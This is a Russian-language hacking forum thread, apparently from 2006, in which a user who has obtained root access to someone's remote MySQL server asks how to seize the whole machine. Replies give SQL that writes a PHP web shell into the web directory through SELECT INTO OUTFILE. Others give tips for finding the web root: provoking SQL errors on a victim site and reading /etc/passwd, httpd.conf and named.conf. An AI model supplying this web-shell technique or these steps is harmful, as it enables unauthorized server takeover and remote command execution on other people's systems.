Зашёл удолёно на MySql под root. Подскажите как захватить сервак.

Discussion in 'PHP' started by faust45, 4 Jun 2006.

  1. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Я думал скрипт залить но как я потом его вызову ?
    Думал может в таблицы какието файлы по заливать а потом почитать их но как
    заливать данные из таблиц
    Помогите пожалуйста.
     
  2. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    CREATE TABLE `shell` (s TEXT);
    INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
    SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;
    DROP TABLE `shell`;
     
  3. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    ето ты конечно ловко придумал:
    SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;

    только вот как узнать полные пути к катологам в которых разрешено выполнение скриптов?
     
  4. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Попробуй на самом серваке скрипты пощупать. Может удача улыбнёться и ты увидишь северный путь :d
     
  5. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    У меян короче такой же косяк. Я короче путь знаю всё когда прописываю выдаёт следующее "You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO `shell` values (''); SEL". Я в скулях особо не разбираюсь но скажите мне что за ошибка?
     
  6. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    victim.ru/check.php=into
    Это просто глупый пример,попробуй вместо into подставить ' ,если будет ошибка узнаешь часть серв. пути.
    victim.ru/check.php='
     
  7. K[o]S

    K[o]S Member

    Joined:
    29 Jul 2005
    Messages:
    17
    Likes Received:
    5
    Reputations:
    4
    INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
    замени на
    INSERT INTO `s` values ('<? passthru("$cmd"); ?>');
     
  8. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    А разницы? лучше не стало такая же ошибка. Использую скрипт от rst.
     
  9. Trinux

    Trinux Members of Antichat

    Joined:
    26 Nov 2004
    Messages:
    1,403
    Likes Received:
    296
    Reputations:
    364
    2 SanyaX
    версия твоего мускуля не поддерживает выполнение нескольких sql запросов через ; вот и все... насколько я понимаю
     
    _________________________
  10. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    ну можно например из /etc/passwd узнать путь к апачу. оттуда по всем извесным относительным путям conf/httpd.conf узнаешь путь к директории со скриптами. санякс пока ни одна версия мускля не обрабатывает запрос после ; по-крайней мере пхп библиотека для работы с мускл сервером за один mysql_query этого не позволяет.
     
  11. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Уважаемий ZaCo
    Разьясните пожалуйста мне как из /etc/passwd узнать путь к апачу.
     
  12. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Да и ещё вопросик, я слышал что в таблицы(MySql) Даные можно заливать из файлов.

    Подскажите как?
     
  13. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    1 person likes this.
  14. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Но может у когото будут дополнения.
    Буду рад услышать.
     
    1 person likes this.
  15. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    в етк\пассвд хранятся пути к каталогам пользователей системы. дабы повысить безопасность каждому домону лучше выдавать свою ограниченную учетную запись. апач же обычно так и запускают, поэтому в большенстве случаев можно определить путь к каталогу апача.
     
  16. K[o]S

    K[o]S Member

    Joined:
    29 Jul 2005
    Messages:
    17
    Likes Received:
    5
    Reputations:
    4
    Там есть домашняя директория юзера apach но наивно палагать что тебе можно читать httpd.conf
    посмотри лучше в /etc/named.conf сопоставь с данными из /etc/passwd если есть чтото общее ;) то заливай шел и через сайт ломись

    http://www.mysql.ru/docs/man/LOAD_DATA.html

    Удачи !
     
    1 person likes this.
  17. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Всем большое спасибо!

    при попытке читать /etc/named.conf пишет Can't get stat
    А вот /etc/passwd читает!!!!!
    Ну буду копать теперь есть материлы к размышлению!!!

    Кстате я хотел узнать на счет ответсвенности за действия подобного рода........
    может поделитесь опытом????
     
  18. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    locate httpd.conf
    find / -name httpd.conf


    Enjoy....
     
Loading...
Similar Threads - Зашёл удолёно MySql
  1. GAiN
    Replies:
    3
    Views:
    7,553